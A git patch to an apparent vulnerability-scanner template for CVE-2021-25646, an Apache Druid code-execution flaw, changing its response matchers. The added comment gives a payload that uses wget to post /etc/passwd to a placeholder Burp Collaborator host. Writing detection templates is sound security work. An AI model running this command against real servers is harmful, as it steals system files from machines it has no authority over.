From b33a15f3e24d7aa59abde9f8697f3033f1ac3c33 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Wed, 3 Feb 2021 21:42:03 +0530
Subject: [PATCH] Update CVE-2021-25646.yaml

---
 cves/2021/CVE-2021-25646.yaml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml
index 9820cd7704..e963c52fe7 100644
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -29,6 +29,9 @@ requests:
                                 }
           },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
 
+    # To read system Files, replace (wget example.com) with below payload
+    # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
+
     matchers-condition: and
     matchers:
       - type: status
@@ -42,6 +45,6 @@ requests:
       - type: regex
         regex:
           - "numRowsRead"
-          - "https://druid.apache.org"
+          - "numRowsIndexed"
         part: body
         condtion: and